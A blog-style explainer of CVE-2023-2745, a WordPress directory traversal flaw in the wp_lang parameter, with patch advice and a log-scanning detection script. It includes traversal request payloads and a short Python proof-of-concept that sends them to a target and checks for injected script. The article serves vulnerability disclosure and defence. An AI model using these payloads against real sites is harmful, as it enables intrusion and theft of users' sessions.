WordPress powers over 40% of the web, but that popularity makes it a lucrative target for hackers. In this long read, we’ll break down CVE-2023-2745 — a Directory Traversal vulnerability found in WordPress Core (up to version 6.2) that could let attackers load and execute arbitrary files through the wp_lang parameter — no login required.

What is CVE-2023-2745?

Directory traversal means an attacker tricks software into reading files it shouldn’t, often using special URL or parameter values like ../ to climb up directories.

CVE-2023-2745 is just that — it’s a bug in the way WordPress handles the wp_lang parameter when loading translation files (those “.mo” or “.po” files that make WordPress multilingual). The vulnerability allows someone to specify a path *outside* of the expected translation folders, meaning an attacker can point WordPress to files they actually want loaded and parsed.

Who’s Affected?

This vulnerability affects any WordPress site up to, and including, version 6.2. All it takes is an open upload point — like a form, plugin, or theme feature that allows file uploads — and you could be at risk.

Let’s break this down step by step

1. The attacker somehow uploads a malicious translation file to the website. (This can happen via insecure plugins, file upload forms, or other weak points.)
2. The attacker crafts a request to the site’s front page or admin page, including the wp_lang parameter in the URL, but with a directory traversal payload — for example, wp_lang=../../uploads/evil_translation.
3. WordPress, failing to properly filter or sanitize the path, loads and executes the attacker’s translation file — which could contain malicious code.

A normal request

GET /?wp_lang=fr_FR

A malicious request abusing directory traversal

GET /?wp_lang=../../uploads/evil_translation

WordPress loads evil_translation.mo from a *user-controllable* location. If this file contains, for example, fake translated strings with embedded JavaScript, this could lead to Cross-Site Scripting (XSS).

Proof-of-Concept (PoC) Code

Below is a simple code snippet simulating an HTTP request that would exploit this vulnerability, assuming the attacker has managed to upload a translation file called evil_translation.mo to the uploads directory.

import requests

# Target WordPress URL (trailing slash, so the query string is appended to the site root)
target_url = 'https://targetsite.com/'

# Malicious wp_lang parameter - traverses up directories from the languages folder
payload = '../../uploads/evil_translation'

# Send the exploit request
response = requests.get(f"{target_url}?wp_lang={payload}")

# Crude impact check: look for the marker string the crafted .mo file is assumed to carry
if "alert('XSS')" in response.text:
    print("Possible XSS via malicious translation file!")
else:
    print("Exploit attempt sent. Check for impact.")

A real-world attacker could use Burp Suite, curl, or their browser just as easily.

Real-World Attack Scenario

Let’s say your WordPress has a contact form plugin that lets users upload files (maybe a logo, maybe a resume, or even translation files). If that plugin doesn’t check for file types or restrict file locations, an attacker can upload a crafted .mo file.

Next, the attacker visits

https://yourblog.com/?wp_lang=../../wp-content/uploads/evil_file

If the translation file was crafted to include malicious JavaScript in translation strings (or unusual content that WordPress tries to display), this XSS payload might run in the context of your logged-in users. From there, they could steal cookies, perform actions as your users, or even escalate their access.

- Check for endpoints or plugins on your site that allow uploads, especially translation files.

- Monitor your logs for odd wp_lang parameters, or for errors when trying to load non-standard language files.
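To act on the log-monitoring advice above, here is an added example (not code from the original article, and not WordPress's own validation) that scans web-server access-log lines for wp_lang values that do not look like a locale slug. The combined log format, the locale pattern and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Shape of a normal WordPress locale slug such as fr_FR, pt_BR, de_DE_formal or zh_CN.
# Assumed for this example; a stricter check would allowlist the locales installed under wp-content/languages.
LOCALE_RE = re.compile(r"^[a-z]{2,3}(?:_[A-Z]{2})?(?:_[a-z0-9]+)?$")

# Apache/nginx combined-format request line (client, timestamp, method, request target).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
WP_LANG_RE = re.compile(r"(?:^|&)wp_lang=([^&]*)")

# Constructed sample access-log lines (not real traffic); two carry traversal values,
# one of them URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [17/May/2023:10:01:02 +0000] "GET /?wp_lang=fr_FR HTTP/1.1" 200 5123
203.0.113.7 - - [17/May/2023:10:01:09 +0000] "GET /?wp_lang=../../uploads/evil_translation HTTP/1.1" 200 5201
203.0.113.9 - - [17/May/2023:10:02:15 +0000] "GET /wp-login.php?wp_lang=..%2F..%2Fwp-content%2Fuploads%2Fevil_file HTTP/1.1" 200 4011
203.0.113.11 - - [17/May/2023:10:03:40 +0000] "GET /?wp_lang=de_DE_formal HTTP/1.1" 200 5130
203.0.113.12 - - [17/May/2023:10:04:01 +0000] "GET /?p=12 HTTP/1.1" 200 7710
"""


def classify_wp_lang(raw_value: str) -> str:
    """Return 'ok', 'traversal' or 'malformed' for a raw (still URL-encoded) wp_lang value."""
    decoded = unquote(unquote(raw_value))  # second pass also catches double-encoded ..%252F
    if ".." in decoded or "/" in decoded or "\\" in decoded or "\x00" in decoded:
        return "traversal"
    if not LOCALE_RE.fullmatch(decoded):
        return "malformed"
    return "ok"


def suspicious_wp_lang_requests(log_text: str) -> list:
    """Return (client_ip, raw_value, reason) for every wp_lang value that is not a plain locale slug."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for raw_value in WP_LANG_RE.findall(query):
            reason = classify_wp_lang(raw_value)
            if reason != "ok":
                hits.append((m.group("ip"), raw_value, reason))
    return hits


if __name__ == "__main__":
    for ip, raw_value, reason in suspicious_wp_lang_requests(SAMPLE_LOG):
        print(f"{ip}: wp_lang={raw_value!r} ({reason})")
```

Feed it your real access log instead of SAMPLE_LOG; any "traversal" hit after the patch date is worth correlating with recent uploads to wp-content/uploads.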

References

- Original WPScan Entry – CVE-2023-2745
- WordPress Security Release Announcement
- National Vulnerability Database – CVE-2023-2745

Final Thoughts

Even subtle bugs like directory traversal can become high-impact when mixed with other insecure settings. CVE-2023-2745 is a reminder: patch promptly, and never trust user input — especially when it deals with files or directories.

If you’re a webmaster or developer running WordPress, make sure you’re on version 6.2.1 or above. Regular updates, code reviews, and good file handling are still your best shields against attacks like this.

Stay safe, and keep your WordPress fortress strong!


*This article was written exclusively to explain the real-world risk and technical details behind CVE-2023-2745. Please, only use this knowledge to defend and secure your sites. Doing otherwise may be illegal and unethical.*

Timeline

Published on: 05/17/2023 09:15:00 UTC
Last modified on: 05/26/2023 02:20:00 UTC